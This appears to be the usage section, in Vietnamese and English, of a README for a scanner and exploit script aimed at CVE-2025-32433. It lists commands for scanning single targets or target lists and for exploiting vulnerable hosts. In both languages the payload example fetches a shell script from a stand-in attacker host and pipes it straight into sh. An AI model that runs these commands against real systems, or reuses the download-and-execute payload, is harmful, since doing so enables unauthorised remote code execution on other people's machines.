-
Quét một IP:
python3 elaina_cve2025_32433.py --target 192.168.1.10
- Quét nhiều IP từ file:
python3 elaina_cve2025_32433.py --file targets.txt
- Khai thác nếu phát hiện lỗ hổng:
python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit
- Tùy chọn payload:
python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"
- Xuất ra JSON:
python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json
-
Scan single IP: python3 elaina_cve2025_32433.py --target 192.168.1.10
-
Scan multiple IPs from file:
python3 elaina_cve2025_32433.py --file targets.txt
- Exploit if vulnerability is found:
python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit
- Payload options:
python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"
- Output to JSON:
python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json